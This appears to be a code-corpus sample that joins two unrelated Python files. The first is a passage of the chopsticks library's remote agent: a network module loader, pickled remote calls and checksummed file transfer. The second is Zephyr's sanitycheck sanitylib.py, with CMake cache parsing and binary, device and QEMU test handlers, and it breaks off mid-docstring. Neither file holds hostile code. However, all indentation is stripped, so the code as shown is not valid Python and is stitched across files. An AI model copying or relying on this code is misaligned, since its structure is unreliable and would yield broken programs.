import signal
from hashlib import sha1
import traceback
from base64 import b64decode
import tempfile
import codecs
outqueue = Queue(maxsize=10)
tasks = Queue()
done = object()
running = True
Imp = namedtuple('Imp', 'exists is_pkg file source')
PREFIX = 'chopsticks://'
class Loader:
# Imports that don't succeed after this amount of time will time out
# This can help crash a remote process when the controller hangs, thus
# breaking the deadlock.
TIMEOUT = 5 # seconds
cache = {}
lock = threading.RLock()
ev = threading.Condition(lock)
def __init__(self, path):
if not path.startswith(PREFIX):
raise ImportError()
self.path = path
@classmethod
def on_receive(cls, mod, imp):
with cls.lock:
if isinstance(mod, list):
mod = tuple(mod)
cls.cache[mod] = imp
cls.ev.notifyAll()
def _raw_get(self, fullname):
with self.lock:
if fullname in self.cache:
return self.cache[fullname]
send_msg(OP_IMP, 0, {'imp': fullname})
start = time.time()
self.ev.wait(timeout=self.TIMEOUT)
delay = time.time() - start
if delay >= self.TIMEOUT:
raise IOError(
'Timed out after %ds waiting for import %r'
% (self.TIMEOUT, fullname)
)
try:
imp = self.cache[fullname]
except KeyError:
raise IOError(
'Did not find %s in %s' % (fullname, self.cache)
)
return imp
def get(self, fullname):
if isinstance(fullname, str) and is_builtin(fullname) != 0:
raise ImportError()
imp = self._raw_get(fullname)
if not imp.exists:
raise ImportError()
return imp
def find_module(self, fullname, path=None):
try:
self.get(fullname)
except ImportError:
return None
return self
def load_module(self, fullname):
m = self.get(fullname)
modname = fullname
if fullname == '__main__':
# Special-case __main__ so as not to execute
# if __name__ == '__main__' blocks
modname = '__chopsticks_main__'
mod = sys.modules.setdefault(modname, imp.new_module(modname))
mod.__file__ = PREFIX + m.file
mod.__loader__ = self
if m.is_pkg:
modpath = PREFIX + m.file.rsplit('/', 1)[0] + '/'
mod.__path__ = [modpath]
mod.__package__ = modname
#mod.__loader__ = Loader(modpath)
else:
mod.__package__ = modname.rpartition('.')[0]
code = compile(m.source, mod.__file__, 'exec', dont_inherit=True)
exec(code, mod.__dict__)
if fullname == '__main__':
mod.__name__ == '__main__'
sys.modules[fullname] = mod
return mod
def is_package(self, fullname):
return self.get(fullname).is_pkg
def get_source(self, fullname):
return self.get(fullname).source.decode('utf8')
def get_data(self, path):
"""Get package data from host."""
mod = self.path.rsplit('/', 2)[-2]
relpath = path[len(self.path):]
imp = self.get((mod, relpath))
return imp.source
sys.path.append(PREFIX)
sys.path_hooks.append(Loader)
def transmit_errors(func):
def wrapper(req_id, *args, **kwargs):
try:
return func(req_id, *args, **kwargs)
except:
send_msg(OP_EXC, req_id, {'tb': traceback.format_exc()})
return wrapper
@transmit_errors
def handle_call_threaded(req_id, data):
threading.Thread(target=handle_call_thread, args=(req_id, data)).start()
@transmit_errors
def handle_call_thread(req_id, data):
callable, args, kwargs = pickle.loads(data)
do_call(req_id, callable, args, kwargs)
@transmit_errors
def handle_call_queued(req_id, data):
callable, args, kwargs = pickle.loads(data)
tasks.put((req_id, callable, args, kwargs))
OP_CALL = 0
OP_RET = 1
OP_EXC = 2
OP_IMP = 3
OP_FETCH_BEGIN = 4
OP_FETCH_DATA = 5
OP_FETCH_END = 6
OP_PUT_BEGIN = 7
OP_PUT_DATA = 8
OP_PUT_END = 9
OP_START = 10
# FIXME: handle_call_queued seems to deadlock!
handle_call = handle_call_threaded
@transmit_errors
def handle_fetch(req_id, path):
"""Fetch a file by path."""
tasks.put((req_id, do_fetch, (req_id, path,)))
def do_fetch(req_id, path):
"""Send chunks of a file to the orchestration host."""
h = sha1()
with open(path, 'rb') as f:
while True:
chunk = f.read(10240)
if not chunk:
break
h.update(chunk)
send_msg(OP_FETCH_DATA, req_id, chunk)
return {
'remote_path': str(os.path.abspath(path)),
'sha1sum': h.hexdigest(),
}
@transmit_errors
def do_call(req_id, callable, args=(), kwargs={}):
ret = callable(*args, **kwargs)
send_msg(
OP_RET,
req_id,
{
'ret': ret,
# 'callable': callable.__module__ + '.' + callable.__name__
}
)
def handle_imp(req_id, mod, exists, is_pkg, file, source):
Loader.on_receive(mod, Imp(exists, is_pkg, file, source))
active_puts = {}
def force_str(s):
if not isinstance(s, str):
return s.decode()
return s
@transmit_errors
def handle_begin_put(req_id, path, mode):
prev_umask = os.umask(0o077)
try:
if path is None:
f = tempfile.NamedTemporaryFile(delete=False)
path = wpath = f.name
else:
path = force_str(path)
if os.path.isdir(path):
raise IOError('%s is a directory' % path)
wpath = path + '~chopsticks-tmp'
f = open(wpath, 'wb')
finally:
os.umask(prev_umask)
os.fchmod(f.fileno(), mode)
active_puts[req_id] = (f, wpath, path, sha1())
@transmit_errors
def handle_put_data(req_id, data):
try:
f, wpath, path, cksum = active_puts[req_id]
except KeyError:
# Likely we have crashed out already
return
try:
cksum.update(data)
f.write(data)
except:
try:
os.unlink(wpath)
f.close()
except OSError:
pass
raise
class ChecksumMismatch(Exception):
pass
@transmit_errors
def handle_end_put(req_id, sha1sum):
try:
f, wpath, path, cksum = active_puts.pop(req_id)
except KeyError:
# Likely we have crashed out already
return
received = f.tell()
f.close()
digest = cksum.hexdigest()
sha1sum = force_str(sha1sum)
if digest != sha1sum:
try:
os.unlink(wpath)
except OSError:
pass
raise ChecksumMismatch(
'Checksum failed for transfer %s (%r != %r)' %
(path, digest, sha1sum)
)
if wpath != path:
os.rename(wpath, path)
send_msg(
OP_RET, req_id, {'ret': {
'remote_path': os.path.abspath(path),
'sha1sum': digest,
'size': received
}}
)
def handle_start(req_id, host, path, depthlimit):
sys._chopsticks_host = force_str(host)
sys._chopsticks_path = [force_str(p) for p in path]
sys._chopsticks_depthlimit = depthlimit
send_msg(OP_RET, req_id, {'ret': pickle.HIGHEST_PROTOCOL})
HEADER = struct.Struct('!LLbb')
MSG_BYTES = 1
MSG_PENCODE = 2
def send_msg(op, req_id, data):
"""Send a message to the orchestration host.
We can send either bytes or JSON-encoded structured data; the opcode will
determine which.
"""
if isinstance(data, bytes):
fmt = MSG_BYTES
else:
fmt = MSG_PENCODE
data = pencode(data)
chunk = HEADER.pack(len(data), req_id, op, fmt) + data
outqueue.put(chunk)
def read_msg():
buf = inpipe.read(HEADER.size)
if not buf:
return
(size, req_id, op, fmt) = HEADER.unpack(buf)
data = inpipe.read(size)
if fmt == MSG_BYTES:
obj = {'data': data}
elif fmt == MSG_PENCODE:
obj = pdecode(data)
else:
debug('Unknown message format %s' % fmt)
return
return (req_id, op, obj)
HANDLERS = {
OP_CALL: handle_call,
OP_IMP: handle_imp,
OP_FETCH_BEGIN: handle_fetch,
OP_PUT_BEGIN: handle_begin_put,
OP_PUT_DATA: handle_put_data,
OP_PUT_END: handle_end_put,
OP_START: handle_start,
}
def reader():
try:
while True:
msg = read_msg()
if msg is None:
break
req_id, op, params = msg
if PY2:
params = dict((str(k), v) for k, v in params.iteritems())
else:
params = dict((force_str(k), v) for k, v in params.items())
HANDLERS[op](req_id, **params)
finally:
outqueue.put(done)
tasks.put(done)
def writer():
while True:
msg = outqueue.get()
if msg is done:
break
outpipe.write(msg)
def run():
for func in (reader, writer):
threading.Thread(target=func).start()
while True:
task = tasks.get()
if task is done:
break
do_call(*task)
# The source code from chopsticks.pencode will be substituted here
# We do this at the end to minimise changes to line numbers
{{ PENCODE }}
run()
|
sanitylib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import yaml
import platform
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# encapsulate terminate functionality so we do it consistently where ever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of both how newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja's don't seem to pass SIGTERM down to the children
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and i['serial']:
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and i['serial']:
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial:
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
if self.suite.west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
if self.suite.west_runner:
command.append("--runner")
command.append(self.suite.west_runner)
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash != []:
command.append('--')
command.extend(self.suite.west_flash.split(','))
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None)
if runner:
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command.append("--runner")
command.append(hardware.get('runner', None))
if runner == "pyocd":
command.append("--board-id")
command.append(board_id)
elif runner == "nrfjprog":
command.append('--')
command.append("--snr")
command.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command.append('--')
command.append("--cmd-pre-init")
command.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command.append('--')
command.append("--cmd-pre-init")
command.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
serial_device = hardware['serial']
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process exection time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
if pid and this_timeout > 0:
#there is possibility we polled nothing because
#of host not scheduled QEMU process enough CPU
#time during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state != 'failed':
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
handler.set_state(out_state, handler_time)
if out_state == "timeout":
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.reason = "Failed"
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
#sometimes QEMU can't handle SIGTERM signal correctly
#in that case kill -9 QEMU process directly and leave
#sanitycheck judge testing result by console output
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
self.returncode = 0
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
self.returncode = proc.returncode
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
if self.returncode != 0:
self.set_state("failed", 0)
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_area",
"_k_timer_area",
"_k_mem_slab_area",
"_k_mem_pool_area",
"sw_isr_table",
"_k_sem_area",
"_k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"_k_stack_area",
"_k_msgq_area",
"_k_mbox_area",
"_k_pipe_area",
"net_if",
"net_if_dev",
"net_l2_data",
"_k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache"
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"object_access",
"rodata",
"devconfig",
"net_l2",
"vector",
"sw_isr_table",
"_settings_handlers_area",
"_bt_channels_area",
"_bt_br_channels_area",
"_bt_services_area",
"vectors",
"net_socket_register",
"net_ppp_proto"
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
